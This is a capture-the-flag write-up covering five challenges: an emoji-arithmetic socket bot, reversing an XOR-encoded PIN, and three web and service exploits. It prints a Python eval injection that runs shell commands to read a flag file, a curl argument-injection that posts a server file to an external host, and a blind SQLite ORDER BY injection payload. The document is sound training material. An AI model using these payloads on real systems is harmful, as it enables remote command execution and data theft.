# CHTB Write-up
----

### Alien Camp 
###### Category: Misc

Main goal of challenge is to be able to read and write emojis on TCP socket connection.
Instead of handling the case to render emojis on terminal, got around the problem by creating a JS script to read and respond to questions as follows:

```text
1. ❓
2. Take test!
> 1
Here is a little help:

🌞 -> 26 🍨 -> 20 ❌ -> 70 🍪 -> 16 🔥 -> 72 ⛔ -> 26 🍧 -> 81 👺 -> 13 👾 -> 82 🦄 -> 42 
```
Get help and map of which emojis points to which number. Then proceed to request for test. 

```text
1. ❓
2. Take test!
> 2

You must answer 500 questions. You have only a few seconds for each question! Be fast! ⏰

Question 1:

🍪 - 🦄  = ?

Answer: -26

Time: 0.15
Correct! ✔
Question 2: ... and so on
```

Read the question, replace the emojis with numbers in the string and pass it as is to `eval` and send the results as response on TCP socket.

Find the [JS code here](./whyemojiswhy.js)

----

### Authenticator
###### Category: Reversing

You are given a executable and we need to be able to make it print our flag.
For any executable, first thing I do is understand what the executable does and what I can get without even executing it. 
Run `file` , it gives you 
```bash
$ file ./authenticator/authenticator 
./authenticator: ELF 64-bit LSB shared object, x86-64, ...
```
This is good enough for us to know its a C or C++ compiled library. Next run the executable to read all strings.
```bash
$ strings ./authenticator/authenticator
...
Please enter your credentials to continue.
Alien ID: 
11337
Access Denied!
...
```
We can see that even without executing it we know what alias needs to be entered.
We execute the script and we find that only `11337` alias is accepted by script.
Then we use a decompiler that I found works flawlessly every single time. 
[retdec](github.com/avast/retdec) works awesome (would like to know if there are better out there than this). We can see following excerpt in the code that checks for PIN.
```c
    char v3 = *(char *)(v1 + (int64_t)"}a:Vh|}a:g}8j=}89gV<p<}:dV8<Vg9}V<9V<:j|{:"); // 0x98b
    int64_t result = 1; // 0x9a7
    while ((v3 ^ 9) == *(char *)(v1 + (int64_t)str)) {
        // 0x9b4
        v2++;
        v1 = v2;
        result = 0;
        if ((int64_t)strlen((char *)str) - 1 <= v1) {
            // break -> 0x9d4
            break;
        }
        v3 = *(char *)(v1 + (int64_t)"}a:Vh|}a:g}8j=}89gV<p<}:dV8<Vg9}V<9V<:j|{:");
        result = 1;
    }
```
It is basically a substitution cipher and the solution is `th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3`.

----
### Input as a Service
###### Category: Misc

Tried opening the service on browser and it looked broken. We use `nc` to connect to service and it returns a python shell, which enabled us to be able to get code executed in server using python's `eval`. (every hacker's dream)

First thing to do is try importing as we have only one line, we use `__import__('os').listdir('/')`. This works we see that there's a file named `flag`.  We get the contents of using following: 
```python
__import__('os').system('cat /app/flag.txt')
```

----

### Caas
###### Category: Web

This for me was easy to figure out but hard to crack. Looking at source code we can easily identify first line
```php
        $this->command = "curl -sL " . escapeshellcmd($url);
```
and then an `exec` of command. 
There is also a validation check for only DN but that's only client side check and sending a raw POST bypasses that. Then next hurdle comes at `escapeshellcmd`, which [escapes good number of symbols](https://www.php.net/manual/en/function.escapeshellcmd.php) before creating the string. (Skip 2 paragraphs for solution)

Here you might waste a lot of time trying to bypass escape function and trying different things as you get to know that `[Space]` is not escaped by the function.   But the solution is rather simple (this truck me after 3 hours).

One thing which is absolutely needed is for you to have local server hosted on internet. The easiest and fastest way is to bring up a [echo-server](https://pypi.org/project/echo-server/) (isn't really that good and I'm planning to have mine soon) and server it using [nginx](https://ngrok.com/).
You could maybe try to `cat` the flag file and send as path param/query param to your local server and log all requests and then read the path. Or maybe just copy file into assets directory to be able to read it via browser. But that fails because most of the times, because execution is mostly guaranteed to not work with `escapeshellcmd`. 

Solution is just to send the `flag` file itself as a HTTP Post data to your local server and just read the POST content using `--data "@/flag"`.

----

### emoji voting
###### Category: Web

Checking the source code we can see that `/api/list` takes and argument  `order` and uses this argument into SQL query without SQL Parameters. We can see in `database.js` that flag table is created with a random number appended to it, which means we also need to figure out the table name. As we are using `sqllite` the table names are stored in `sqlite_master` table. We pass a `case` command to order by one column when condition matches and order my another column when it doesn't. We confirm one character at a time in flag table name by matching the substring of table name. Find the complete [code here](./neversawthatcoming.js).
```js
            // refomatted for understanding purposes
            "body": "{\"order\":\"( 
			  CASE SUBSTR(
			    (   
				    SELECT name FROM sqlite_master 
				    WHERE name LIKE 'flag_%'),1," + _length + "
			    ) 
			    WHEN '" + flag_prefix + flag_char + "' 
			    THEN name ELSE count END
			  ) 
			ASC\"}",
```

Above script is inside a `for` loop which iterates over all possibilities of `flag_...` name and recursively proceeds with names that match the table name.
Once we get the file name we just need the content of flag in first row.
Minor modifications to above query to read the flag ([complete code](./thisIsawcoming.js)) and this challenge is PWN'd as well.


----

Tried following challenges but failed:
 - Web - Cessation
 - Crypto - Tetris
 - Web - E.tree
 - Forensics - Oldest trick in the book
 - Forensics - Invitation
 - Crypto - Forge of Empires
 - Misc - Robotic Infiltration
 - Forensics - Key Mission
 - Reversing - Passphrase
 - Pwn - Controller (really wanna know)
 - Reversing - Backdown
 - Web - Artillery (really wanna know)




